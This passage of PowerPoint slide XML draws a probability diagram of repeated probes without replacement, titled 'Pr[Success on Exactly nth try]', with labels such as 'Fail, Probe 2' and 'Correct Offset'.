            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="35" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5486400" y="5257800"/>
            <a:ext cx="1600200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="4800600"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Correct</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555518253"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="510"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="51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W/O Replacement:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on Exactly nth try]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5410200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Probe 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="6172200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5600700"/>
            <a:ext cx="838200" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5867400"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1447800" y="4267200"/>
            <a:ext cx="1828800" cy="1333500"/>
            <a:chOff x="1447800" y="4267200"/>
            <a:chExt cx="1828800" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1447800" y="4724400"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2057400" y="4267200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130300" y="4749800"/>
            <a:ext cx="715347" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2667000" y="4648200"/>
            <a:ext cx="1981200" cy="914400"/>
            <a:chOff x="2667000" y="4648200"/>
            <a:chExt cx="1981200" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3429000" y="5181600"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667000" y="4648200"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="3429000"/>
            <a:ext cx="751114" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="5029200"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2971800" y="2971800"/>
            <a:ext cx="2057400" cy="1333500"/>
            <a:chOff x="2971800" y="2971800"/>
            <a:chExt cx="2057400" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2971800" y="3429000"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="2971800"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Group 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886200" y="1143000"/>
            <a:ext cx="4191000" cy="3124200"/>
            <a:chOff x="3886200" y="1143000"/>
            <a:chExt cx="4191000" cy="3124200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791200" y="1752600"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6858000" y="2743200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6096000" y="2209800"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6248400" y="1143000"/>
              <a:ext cx="914400" cy="647700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture 27" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791200" y="2438400"/>
              <a:ext cx="664368" cy="442912"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257800" y="3886200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="3352800"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4572000" y="2133600"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 26" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886200" y="3657600"/>
              <a:ext cx="728663" cy="485775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 28" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4343400" y="2057400"/>
              <a:ext cx="711200" cy="505055"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3504568940"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="8261"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="82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143000" y="1981200"/>
            <a:ext cx="6858000" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2743200"/>
            <a:ext cx="6743700" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325438" y="228600"/>
            <a:ext cx="8493125" cy="727075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>W/O Replacement:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on Exactly nth try]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Left Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="2933703" y="1790699"/>
            <a:ext cx="533400" cy="4114801"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:no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2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4038600"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Fail the first n-1 times</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="3886200"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Succeed on nth trial</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6400800" y="3505200"/>
            <a:ext cx="381000" cy="228600"/>
